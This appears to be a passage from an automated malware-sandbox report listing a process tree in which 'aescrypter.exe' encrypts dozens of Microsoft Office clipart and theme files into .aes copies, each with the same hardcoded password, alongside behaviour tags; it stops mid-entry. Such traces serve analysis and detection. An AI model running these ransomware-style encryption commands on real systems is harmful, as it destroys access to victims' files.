  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03143I.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03143I.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1836
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03205I.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03205I.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2468
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03224I.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03224I.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1708
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03379I.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03379I.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2124
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03380I.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03380I.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1596
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03425I.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03425I.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1924
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Adjacency.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Adjacency.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1580
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Angles.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Angles.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2848
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Apex.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Apex.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:536
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Apothecary.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Apothecary.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2860
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Aspect.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Aspect.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:3048
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Austin.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Austin.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2440
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Black Tie.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Black Tie.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2700
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Civic.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Civic.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2780
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Clarity.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Clarity.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2892
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Composite.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Composite.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2720
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Concourse.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Concourse.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2384
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Couture.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Couture.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2376
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Elemental.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Elemental.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2460
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Equity.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Equity.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1316
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Essential.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Essential.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2708
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Executive.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Executive.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2828
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Flow.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Flow.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1380
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Foundry.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Foundry.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2832
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Grayscale.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Grayscale.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1880
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Grid.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Grid.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2348
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Hardcover.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Hardcover.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1744
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Horizon.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Horizon.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1612
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Median.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Median.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1516
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Metro.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Metro.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2272
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Module.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Module.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2160
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Newsprint.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Newsprint.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:3016
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Opulent.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Opulent.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2364
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Oriel.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Oriel.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:3004
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Origin.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Origin.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2092
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Paper.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Paper.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2992
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Perspective.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Perspective.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2236
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Pushpin.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Pushpin.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:772
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Slipstream.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Slipstream.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2472
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Solstice.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Solstice.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1628
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Technic.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Technic.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1052
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Thatch.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Thatch.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1084
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Trek.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Trek.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2188
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Urban.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Urban.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1976
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Verve.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Verve.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2576
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Waveform.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Waveform.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1868
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Adjacency.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Adjacency.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2452
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Angles.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Angles.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1532
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Apex.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Apex.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:604
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Apothecary.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Apothecary.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2724
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Aspect.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Aspect.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2468
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Austin.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Austin.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1708
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Black Tie.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Black Tie.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2124
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Civic.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Civic.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2184
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Clarity.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Clarity.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2308
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Composite.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Composite.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1916
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Concourse.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Concourse.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2540
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Couture.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Couture.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2848
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Elemental.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Elemental.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2872
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Equity.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Equity.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:3008
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Essential.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Essential.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2732
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Executive.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Executive.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1720
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Flow.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Flow.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2764
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Foundry.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Foundry.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2200
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Grid.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Grid.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  PID:2664
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Hardcover.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Hardcover.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2480
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Horizon.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Horizon.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2656
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Median.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Median.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2376
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Metro.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Metro.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2460
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Module.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Module.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2808
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Newsprint.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Newsprint.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2844
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Office 2.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Office 2.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2828
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Office Classic 2.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Office Classic 2.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1380
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Office Classic.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Office Classic.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2028
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Opulent.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Opulent.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2784
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Oriel.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Oriel.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2660
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Origin.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Origin.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1500
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Paper.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Paper.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2836
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Perspective.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Perspective.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1516
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Pushpin.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Pushpin.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1420
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Slipstream.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Slipstream.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1244
- C:\ProgramData\local\aescrypter.exe
